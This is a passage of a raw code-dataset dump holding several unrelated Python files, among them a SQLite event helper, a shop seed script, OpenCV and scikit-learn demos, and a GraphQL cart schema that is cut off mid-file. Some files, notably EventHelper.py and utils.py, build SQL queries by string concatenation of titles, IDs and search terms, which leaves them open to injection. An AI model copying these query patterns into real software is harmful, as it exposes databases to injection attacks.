title\"\n\t\tsqlExecuteString = str(\t\"SELECT id, regionId, frame as s_frame, frame as e_frame, \"+labelNameStr+\", source, serialId from '\"+self.VideoName+\"_event_a' A where source = 0 and serialId = \"+ str(shapeId)+ \\\n\t\t\t\t\t\t\t\t\" union \" \\\n\t\t\t\t\t\t\t\t\"SELECT id, 'None', s_frame, e_frame, title, source, serialId from '\"+self.VideoName+\"_event_u' A where source = 0 and serialId = \"+ str(shapeId))\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregionId = str(row[1]) if row[1] is not 'None' else None\n\t\t\ts_frame = int(row[2])\n\t\t\te_frame = int(row[3])\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5])\n\t\t\tserialId = int(row[6])\n\t\t\tself.events.append((id, regionId, s_frame, e_frame, title, source, serialId))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef getEventByTracker(self, shapeId):\n\t\tself.events = []\n\t\tactionStr = \" (select ' 位於 ') \"\n\t\tregionNameStr = \"(select regionName from '\"+self.VideoName+\"_region' where id = A.regionId)\"\n\t\tsequenceStr = \"(select '(' || sequence || ')' from '\"+self.VideoName+\"_seq' where source = A.source and serialId = A.serialId)\"\n\t\tlabelNameStr = \"(select labelName from '\"+self.VideoName+\"_tracker' where tracker = A.serialId)\"\n\t\ttitleStr = labelNameStr + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as title\"\n\t\tsqlExecuteString = str(\t\"SELECT id, regionId, min(frame) as s_frame, max(frame) as e_frame, \"+titleStr+\", source, serialId from '\"+self.VideoName+\"_event_a' A where source = 1 and serialId = \"+ str(shapeId)+\" group by regionId\" \\\n\t\t\t\t\t\t\t\t\" union \" \\\n\t\t\t\t\t\t\t\t\"SELECT id, 'None', s_frame, e_frame, title, source, serialId from '\"+self.VideoName+\"_event_u' A where source = 1 and serialId = \"+ str(shapeId))\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregionId = str(row[1]) if row[1] is not 'None' else None\n\t\t\ts_frame = int(row[2])\n\t\t\te_frame = int(row[3])\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5])\n\t\t\tserialId = int(row[6])\n\t\t\tself.events.append((id, regionId, s_frame, e_frame, title, source, serialId))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef getEventByRegion(self, regionId):\n\t\tself.events = []\n\t\tactionStr = \" (select ' 位於 ') \"\n\t\tregionNameStr = \"(select regionName from '\"+self.VideoName+\"_region' where id = A.regionId)\"\n\t\tsequenceStr = \"(select '(' || sequence || ')' from '\"+self.VideoName+\"_seq' where source = A.source and serialId = A.serialId)\"\n\t\tlabelNameStr = [\"(select labelName from '\"+self.VideoName+\"' where id = A.serialId)\", \"(select labelName from '\"+self.VideoName+\"_tracker' where tracker = A.serialId)\"]\n\t\ttitleStr = [labelNameStr[0] + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as title\", labelNameStr[1] + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as title\"]\n\t\tsqlExecuteString = str(\t\"SELECT id, regionId, frame as s_frame, frame as e_frame, \"+titleStr[0]+\", source, serialId from '\"+self.VideoName+\"_event_a' A where regionId = \"+ str(regionId) +\" and source = 0\" \\\n\t\t\t\t\t\t\t\t\" union \" \\\n\t\t\t\t\t\t\t\t\"SELECT id, regionId, min(frame) as s_frame, max(frame) as e_frame, \"+titleStr[1]+\", source, serialId from '\"+self.VideoName+\"_event_a' A where regionId = \"+ 
str(regionId) +\" and source = 1 group by serialId order by source desc, frame asc\")\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregionId = str(row[1])\n\t\t\ts_frame = int(row[2])\n\t\t\te_frame = int(row[3])\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5])\n\t\t\tserialId = int(row[6])\n\t\t\tself.events.append((id, regionId, s_frame, e_frame, title, source, serialId))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef getRelEventById(self, serial):\n\t\tself.events = []\n\t\tshape_type, serialId = serial\n\t\tkeys = {'shape':0, 'tracker':1, 'region':2}\n\t\tselectSequenceSql = str(\"(select sequence from '\"+self.VideoName+\"_seq' B where B.source = \"+str(keys[shape_type])+\" and B.serialId = \"+ str(serialId) +\" union select 'None' as sequence)\")\n\t\tsqlExecuteString = str(\t\"SELECT A.id, A.eventId, A.s_frame, A.e_frame, A.title, A.source, A.serialId, \"+selectSequenceSql+\" from '\"+self.VideoName+\"_event_r' A where A.eventId in (select eventId from '\"+self.VideoName+\"_event_r' where source = \"+str(keys[shape_type])+\" and serialId = \"+ str(serialId) +\")\")\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = int(row[0]) if row[0] is not None else None\n\t\t\teventId = int(row[1]) if row[1] is not None else None\n\t\t\ts_frame = int(row[2]) if row[2] is not None else None\n\t\t\te_frame = int(row[3]) if row[3] is not None else None\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5]) if row[5] is not None else None\n\t\t\tserialId = int(row[6]) if row[6] is not None else None\n\t\t\tsequence = None if str(row[7]) == str('None') else str(row[7])\n\t\t\tif source is not None:\n\t\t\t\tself.events.append((id, eventId, s_frame, e_frame, title, source, serialId, sequence))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef deleteAutoEventRelShape(self, regionId, frame=None):\n\t\tif self.sqlConn is not None:\n\t\t\tframeStr = '' if frame is None else ' and frame = '+str(frame)\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where regionId = \"+ str(regionId)+ \" and source = 0\" + frameStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteAutoEventRelTracker(self, tracker=None, frameStart=0, frameEnd=None):\n\t\tif self.sqlConn is not None:\n\t\t\ttrackerStr = '' if tracker is None else ' and serialId = ' + str(tracker)\n\t\t\tframeStr = ' and '+ str(frameStart) +' >= frame ' if frameEnd is None else ' and '+ str(frameStart) +' >= frame and frame >= ' + str(frameEnd)\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where source = 1 \" + trackerStr + frameStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventByRegion(self, regionId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where regionId = \"+ str(regionId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_r' where source = 2 and serialId = \"+ str(regionId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventByShape(self, serialId):\n\t\tif self.sqlConn is not 
None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where source = 0 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_u' where source = 0 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_r' where source = 0 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventByTracker(self, serialId):\n\t\tif serialId is None:\n\t\t\treturn True\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_a' where source = 1 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_u' where source = 1 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_event_r' where source = 1 and serialId = \"+ str(serialId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteEventById(self, eventType, id):\n\t\ttables = {'relation': '_event_r', 'user_event': '_event_u'}\n\t\twheres = {'relation': 'eventId', 'user_event': 'id'}\n\t\tif self.sqlConn is not None and eventType in tables:\n\t\t\tsqlExecuteString = str(\"delete from '\"+self.VideoName+tables[eventType]+\"' where \"+ wheres[eventType] +\" is \"+str(id))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeAutoEventDataByShape(self, regionId, frame, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tifNotExistStr = \" where not exists (select 1 from '\"+self.VideoName+\"_event_a' where regionId = \"+str(regionId)+\" and frame = \"+str(frame)+\" and source = 0 and serialId = \"+str(serialId)+\")\"\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_a' (frame, regionId, source, serialId) select \"+str(frame)+\", \"+str(regionId)+\", 0, \"+str(serialId) + ifNotExistStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeAutoEventDataByTracker(self, regionId, frame, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tifNotExistStr = \" where not exists (select 1 from '\"+self.VideoName+\"_event_a' where regionId = \"+str(regionId)+\" and frame = \"+str(frame)+\" and source = 1 and serialId = \"+str(serialId)+\")\"\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_a' (frame, regionId, source, serialId) select \"+str(frame)+\", \"+str(regionId)+\", 1, \"+str(serialId) + ifNotExistStr)\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeShapeEventData(self, frame, title, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_u' (s_frame, e_frame, title, source, serialId) VALUES (\"+str(frame)+\", \"+str(frame)+\", '\"+str(title)+\"', 0, 
\"+str(serialId)+\")\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeTrackerEventData(self, frame, title, serialId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_u' (s_frame, e_frame, title, source, serialId) VALUES (\"+str(frame)+\", \"+str(frame)+\", '\"+str(title)+\"', 1, \"+str(serialId)+\")\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeRelEventData(self, frame, title, serialIds):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"select max(seq) from SQLITE_SEQUENCE where name='\"+self.VideoName+\"_event_r'\")\n\t\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\t\trow = cursor.fetchone()\n\t\t\teventId = int(row[0]) if row[0] is not None else 0\n\t\t\tfor serial in serialIds:\n\t\t\t\tshape_type, serialId = serial\n\t\t\t\tkeys = {'shape':0, 'tracker':1, 'region':2}\n\t\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_event_r' (eventId, s_frame, e_frame, title, source, serialId) VALUES (\"+str(eventId)+\",\"+str(frame)+\",\"+str(frame)+\", '\"+str(title)+\"', \"+str(keys[shape_type])+\", \"+str(serialId)+\")\")\n\t\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef getEventDetailBySource(self, source, serialId):\n\t\ttables = {'0':'', '1':'_tracker', '2':'_region'}\n\t\tcolumns = {'0':'labelName', '1':'labelName', '2':'regionName'}\n\t\twheres = {'0': 'id', '1': 'tracker', '2': 'id'}\n\t\tselectSequenceSql = str(\"(select sequence from '\"+self.VideoName+\"_seq' B where B.source = \"+str(source)+\" and B.serialId = \"+ str(serialId) +\" union select 'None' as sequence)\")\n\t\tsqlExecuteString = str(\t\"SELECT A.\"+ columns[str(source)] +\" as label, \"+selectSequenceSql+\" from '\"+ self.VideoName+tables[str(source)] +\"' A where \"+ wheres[str(source)] +\" = \"+ str(serialId))\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\treturn (row[0], None if str(row[1]) == str('None') else str(row[1]))\n\t\treturn None\n","sub_path":"EventHelper.py","file_name":"EventHelper.py","file_ext":"py","file_size_in_byte":21653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633023294","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport datetime\nfrom Database_Set import *\n\nengine = create_engine('sqlite:///shopping.db')\n# Bind the engine to the metadata of the Base class so that the\n# declaratives can be accessed through a DBSession instance\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\n# A DBSession() instance establishes all conversations with the database\n# and represents a \"staging zone\" for all the objects loaded into the\n# database session object. Any change made against the objects in the\n# session won't be persisted into the database until you call\n# session.commit(). 
If you're not happy about the changes, you can\n# revert all of them back to the last commit by calling\n# session.rollback()\nsession = DBSession()\n\n# Delete Shopping if existing.\nsession.query(Shopping).delete()\n# Delete BrandName if existing.\nsession.query(BrandName).delete()\n# Delete User if existing.\nsession.query(User).delete()\n\n# Create sample user data\nUser1 = User(name=\"yelchuri Aakanksha\",\n email=\"aakanksha.yelchuri@gmail.com\",\n picture='http://www.enchanting-costarica.com/wp-content/'\n 'uploads/2018/02/jcarvaja17-min.jpg')\nsession.add(User1)\nsession.commit()\nprint (\"Successfully added first user\")\n# Create sample brand companies\nCompany1 = Shopping(name=\"Women's Fashion\",\n user_id=1)\nsession.add(Company1)\nsession.commit()\n\nCompany2 = Shopping(name=\"Men's Fashion\",\n user_id=1)\nsession.add(Company2)\nsession.commit()\n\nCompany3 = Shopping(name=\"Accessories\", user_id=1)\nsession.add(Company3)\nsession.commit()\n\nCompany4 = Shopping(name=\"Car,Motorbikes\", user_id=1)\nsession.add(Company4)\nsession.commit()\n\nCompany5 = Shopping(name=\"Toys and Baby World\", user_id=1)\nsession.add(Company5)\nsession.commit()\n\nCompany6 = Shopping(name=\"Electronic Gadgets\", user_id=1)\nsession.add(Company6)\nsession.commit()\n\n# Populate the shops with models for testing\n# Using different names and years for the shops as well\nName1 = BrandName(name=\"Women's Dress\",\n year=\"2019\",\n color=\"black\",\n brand=\"AQUA\",\n price=\"750\",\n shoppingid=1,\n user_id=1)\nsession.add(Name1)\nsession.commit()\n\nName2 = BrandName(name=\"Men's Dress\",\n year=\"2019\",\n color=\"blue\",\n brand=\"Denim\",\n price=\"1500\",\n shoppingid=2,\n user_id=1)\nsession.add(Name2)\nsession.commit()\n\nName3 = BrandName(name=\"Hand Bags\",\n year=\"2018\",\n color=\"All colors\",\n brand=\"Guess\",\n price=\"5,000\",\n shoppingid=3,\n user_id=1)\nsession.add(Name3)\nsession.commit()\n\nName4 = BrandName(name=\"Scooty\",\n year=\"2017\",\n color=\"purple\",\n brand=\"Activa 5G\",\n price=\"55,950\",\n shoppingid=4,\n user_id=1)\nsession.add(Name4)\nsession.commit()\n\nName5 = BrandName(name=\"Toys\",\n year=\"2014\",\n color=\"orange\",\n brand=\"Disney\",\n price=\"600\",\n shoppingid=5,\n user_id=1)\nsession.add(Name5)\nsession.commit()\n\nName6 = BrandName(name=\"Mobiles\",\n year=\"2019\",\n color=\"Black\",\n brand=\"Samsung\",\n price=\"13,000\",\n shoppingid=6,\n user_id=1)\nsession.add(Name6)\nsession.commit()\n\nprint(\"Your Shopping database has been inserted successfully!\")\n\n","sub_path":"catalog/Data_start.py","file_name":"Data_start.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"478954822","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 11:28:43 2019\n\n@author: tarun.bhavnani@dev.smecorner.com\n\"\"\"\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\n\n\nvectorizer1 = CountVectorizer()\nvectorizer2 = TfidfVectorizer()\n\n\ntext=[\"tarun bhavnani\",\"works in smecorner\",\"is a data scientist and an NLP scientist\",\"tarun is building a chatbot\"]\n\ntt1=vectorizer1.fit_transform(text)\nvectorizer1.vocabulary_\ntt2=vectorizer2.fit_transform(text)\nvectorizer2.vocabulary_\n\n\nprint(tt2)\ntt1.toarray()\ntt2.toarray()\n\n\nvectorizer3 = CountVectorizer(ngram_range=(1, 2))\nvectorizer4 = TfidfVectorizer(ngram_range=(1, 
2))\n\ntt3=vectorizer3.fit_transform(text)\nvectorizer3.vocabulary_\ntt4=vectorizer4.fit_transform(text)\nvectorizer4.vocabulary_\n","sub_path":"Bow_creation.py","file_name":"Bow_creation.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"306743554","text":"import cv2\n\no = cv2.imread('img12.jpg')\nimg = o\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nret, binary = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\ncontours, hierarchy = cv2.findContours(binary, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\nhull = cv2.convexHull(contours[0])\nimage = cv2.cvtColor(binary, cv2.COLOR_GRAY2BGR)\ncv2.polylines(image, [hull], True, (0,255,0), 2)\n\ndistA = cv2.pointPolygonTest(hull, (320, 115), True)\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(image, 'A', (320, 115), font, 1, (0,255,0), 3)\nprint('distA = ', distA)\n\ndistB = cv2.pointPolygonTest(hull, (300, 200), True)\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(image, 'B', (300, 200), font, 1, (0,255,0), 3)\nprint('distB = ', distB)\n\ndistC = cv2.pointPolygonTest(hull, (440, 76), True)\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(image, 'C', (440, 76), font, 1, (0,255,0), 3)\nprint('distC = ', distC)\n\n#print(hull)\n\ncv2.imshow('result', image)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"ex12-24.py","file_name":"ex12-24.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542663656","text":"import math\nfrom functools import partial\n\nimport numpy as np\n\nfrom dpipe.dl.model_controller import ModelController\nfrom dpipe.utils.batch_iter_factory import BatchIterFactory\nfrom dpipe.medim.metrics import multichannel_dice_score\nfrom .utils import make_find_next_lr, make_check_loss_decrease\n\n\ndef train_segm(\n model_controller: ModelController,\n train_batch_iter_factory: BatchIterFactory,\n val_ids, dataset, *, n_epochs, lr_init, lr_dec_mul=0.5,\n patience: int, rtol=0, atol=0):\n val_x = [dataset.load_mscan(p) for p in val_ids]\n val_segm = [dataset.load_segm(p) for p in val_ids]\n val_msegm = [dataset.load_msegm(p) for p in val_ids]\n\n find_next_lr = make_find_next_lr(\n lr_init, lambda lr: lr * lr_dec_mul,\n partial(make_check_loss_decrease, patience=patience,\n rtol=rtol, atol=atol))\n\n lr = find_next_lr(math.inf)\n with train_batch_iter_factory:\n for i in range(n_epochs):\n with next(train_batch_iter_factory) as train_batch_iter:\n train_loss = model_controller.train(train_batch_iter, lr=lr)\n lr = find_next_lr(train_loss)\n\n y_pred_proba, val_loss = model_controller.validate(val_x, val_segm)\n\n y_pred = [np.argmax(y, axis=0) for y in y_pred_proba]\n msegm_pred = [dataset.segm2msegm(y) for y in y_pred]\n\n dices = [multichannel_dice_score(pred, true)\n for pred, true in zip(msegm_pred, val_msegm)]\n\n print('{:>5} {:>10.5f} {}'.format(i, val_loss,\n np.mean(dices, axis=0)))\n","sub_path":"dpipe/train/train_segm.py","file_name":"train_segm.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288878711","text":"\nimport json\n\ndef get_number_of_documents(documents):\n return len(documents)\n\ndef get_unique_devices(documents):\n devices = []\n for d in documents:\n devices.append(d['device'])\n return list(set(devices))\n\ndef get_device_info(documents):\n devices = []\n for d in 
documents:\n info = {\n \"device\" : d['device'],\n \"location\" : d['location'],\n \"sensors\" : sorted(d['data'].keys()) # get sensor keys and sort them alphabetically\n }\n devices.append(json.dumps(info))\n unique_devices = list(set(devices))\n info = []\n for u_d in unique_devices:\n info.append(json.loads(u_d))\n return info\n","sub_path":"azure_APP/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"116510409","text":"import jieba\nimport jieba.analyse\n\nfrom db_handler import engine\n\n\ndef init_database():\n bank_exist = engine.check_table_exist(\"t_bank\")\n init_result = [False, False]\n\n config_exist = engine.check_table_exist(\"t_config\")\n if not config_exist:\n config_sql = \"\"\"create table t_config(\n pno INTEGER primary key autoincrement, \n left_top VARCHAR,\n right_bottom VARCHAR,\n auto_apply INTEGER, \n left_top_ans VARCHAR,\n right_bottom_ans VARCHAR, \n ans_1 VARCHAR,\n ans_2 VARCHAR,\n ans_3 VARCHAR,\n ans_4 VARCHAR\n )\"\"\"\n engine.execute(query=config_sql)\n init_result[0] = True\n\n if not bank_exist:\n sql = \"\"\"create table t_bank(\n pno INTEGER primary key autoincrement, \n ques VARCHAR not null,\n ans VARCHAR,\n wrong_ans VARCHAR \n )\"\"\"\n engine.execute(query=sql)\n init_result[1] = True\n return init_result\n\n\ndef init_data(ques, ans, wrong_ans=\"\"):\n sql = \"insert into t_bank(ques, ans, wrong_ans) values (\\\"{}\\\", \\\"{}\\\", \\\"{}\\\")\".format(ques, ans, wrong_ans)\n engine.execute(query=sql)\n\n\ndef init_config():\n sql = \"insert into t_config(auto_apply) values (\\\"{}\\\")\".format(1)\n engine.execute(query=sql)\n\n\ndef init_all_data(file_url, init_database_result):\n if init_database_result[0]:\n print(\"start initial config...\")\n init_config()\n\n if init_database_result[1]:\n count = 0\n print(\"start initial base data...\")\n with open(file_url,\"r\", encoding=\"gb18030\") as f:\n for line in f.readlines():\n if len(line.split(\"\\\",\\\"\")) == 3:\n line_list = line.split(\"\\\",\\\"\")[:2]\n ques = line_list[0].strip(\"\\\"\")\n ans = line_list[1]\n init_data(ques, ans)\n count += 1\n if count % 1000 == 0:\n print(\"have initial {} datas\".format(count))\n\n\ndef handle_words(res):\n # print(res)\n words = res.get(\"words_result\")\n words_ques = \"\".join([r.get(\"words\") for r in words[:-4]])\n words_ans = [r.get(\"words\") for r in words[-4:]]\n return words_ques, words_ans\n\n\ndef search_related_records(word_list):\n params = \"%\"\n if len(word_list) <= 1:\n return []\n for word in word_list:\n params += word[:3]\n params += \"%\"\n # print(params)\n sql = \"select * from t_bank where ques like '{}'\".format(params)\n res = engine.execute(query=sql).fetchall()\n # print(res)\n return res\n\n\ndef get_keywords(content):\n tags = jieba.analyse.extract_tags(content, topK=10) # error sorted\n\n tags = list(tags)\n tags.sort(key=lambda x: content.index(x))\n return list(tags)\n\n\ndef get_user_config():\n config_exist = engine.check_table_exist(\"t_config\")\n if config_exist:\n config_exist = config = engine.execute(query=\"select * from t_config limit 1\").fetchone()\n return config_exist\n\n\ndef after_right_answer(ques, ans):\n #\n ...\n\n\ndef after_wrong_answer():\n ...\n\n\nif __name__ == '__main__':\n # init_database()\n # print(engine.execute(query=\"select count(1) from t_bank\").fetchall())\n # sql = \"select * from t_bank where ques like \\\"%皮肤哪一部分受损%\\\"\"\n # 
print(engine.execute(query=sql).fetchall())\n ...\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"112720029","text":"from _battlesnake import Game, Block\n\n# whether or not to print output\noutput = False\n\ndef getVal(direction, data):\n g = Game(data)\n block = g.snake.head.getAdj(direction)\n\n # check if block is outside map\n if block.x < 0 or block.x > g.width-1 or block.y < 0 or block.y > g.height-1:\n if output:\n print(direction, ': outside of map!')\n return 0\n\n # check if block is one of our body parts\n if block in g.snake.parts[:-1]:\n if output:\n print(direction, ': is one of our parts (but not tail)!')\n return 0\n\n # get other snake tail positions\n tails = []\n for snake in g.others:\n tails.append(snake.tail)\n\n for snake in g.others:\n\n # check if block is other snake body part\n if block in snake.parts[:-1]:\n if output:\n print(direction, ': is other snake part (but not tail)!')\n return 0\n\n # check if block is where other snakes tail would be if it eats adjacent food\n if snake.head.isAdjTo(g.food) and block in tails:\n if output:\n print(direction, ': other snake could eat, not moving into their tail!')\n return 0\n\n return 1\n\nif __name__ == '__main__':\n data = { \"you\": \"25229082-f0d7-4315-8c52-6b0ff23fb1fb\", \"width\": 15, \"height\": 15, \"turn\": 0, \"snakes\": [{ \"taunt\": \"git gud\", \"name\": \"my-snake\", \"id\": \"25229082-f0d7-4315-8c52-6b0ff23fb1fb\", \"health_points\": 93, \"coords\": [ [ 5, 9 ], [ 4, 9 ], [ 4, 8 ],[ 4, 7 ],[ 4, 6 ],[ 4, 5 ],[ 4, 4 ],[ 4, 3 ] ] }, { \"taunt\": \"git gud\", \"name\": \"meow-snake\", \"id\": \"nan\", \"health_points\": 93, \"coords\": [ [ 6, 11 ], [ 6, 10 ],[ 6, 9 ],[ 6, 8 ],[ 6, 7 ],[ 6, 6 ],[ 6, 5 ],[ 6, 4 ],[ 6, 3 ],[ 6, 2 ],[ 5, 2 ] ] } ], \"game_id\": \"870d6d79-93bf-4941-8d9e-944bee131167\", \"food\": [ [7,8], [7,9],[7,10],[7,11],[7,12],[8,12],[9,12] ], \"dead_snakes\": []}\n if output:\n for i in ['up', 'left', 'down', 'right']:\n print(\"%s: %f\" % (i, getVal(i, data)))","sub_path":"app/factors/basic_collision.py","file_name":"basic_collision.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"613823132","text":"import graphene\nimport django\nfrom collections import defaultdict\nfrom graphene_django.types import DjangoObjectType\nfrom products.models import Category, Product, PercentSale, PackageDeal\n\n\nclass CategoryType(DjangoObjectType):\n class Meta:\n model = Category\n\n\nclass UserType(DjangoObjectType):\n class Meta:\n model = django.contrib.auth.models.User\n\n\nclass PercentSaleType(DjangoObjectType):\n class Meta:\n model = PercentSale\n\n\nclass PackageDealType(DjangoObjectType):\n class Meta:\n model = PackageDeal\n\n\nclass ProductType(DjangoObjectType):\n percentSale = PercentSaleType\n packageDeal = PackageDealType\n\n class Meta:\n model = Product\n\n\nclass CartItem(graphene.ObjectType):\n product = graphene.NonNull(ProductType)\n quantity = graphene.NonNull(graphene.Int)\n unitPrice = graphene.NonNull(graphene.Float)\n originalPrice = graphene.NonNull(graphene.Float)\n\n\nclass CartItemInput(graphene.InputObjectType):\n product = graphene.NonNull(graphene.ID)\n quantity = graphene.NonNull(graphene.Int)\n\n\nclass CartType(graphene.ObjectType):\n items = graphene.List(CartItem)\n totalBeforeDiscount = graphene.Float()\n totalDiscount = 
graphene.Float()\n total = graphene.Float()\n\n @staticmethod\n def find_sale_details(product_quantity, product_pricing,\n product_packagedeal):\n dbproducts = {}\n for product_id in product_quantity:\n # Find the product in the DB\n deal_product = Product.objects.filter(id=product_id)\n\n # Verify if product is valid\n if deal_product:\n deal_product = deal_product[0]\n else:\n continue\n\n # Add all to the result list\n if product_id in dbproducts:\n raise ValueError('Duplicate items')\n item = CartItem()\n item.product = deal_product\n item.quantity = product_quantity[product_id]\n dbproducts[product_id] = item\n\n # If the price has been calculated, skip the item\n if product_id in product_pricing:\n continue\n\n # Default price\n sale_price = deal_product.price\n\n deals = PercentSale.objects.filter(product=deal_product)\n max_deal = None\n for deal in deals:\n if max_deal is None:\n max_deal = deal\n else:\n if deal.cut > max_deal.cut:\n max_deal = deal\n\n if max_deal is not None:\n sale_price *= (100 - max_deal.cut) / 100.\n\n # The first package deal is picked\n package_deals = PackageDeal.objects.filter(product=deal_product)\n if package_deals:\n product_packagedeal[product_id] = package_deals[0]\n\n # Summarize details per product\n product_pricing[product_id] = 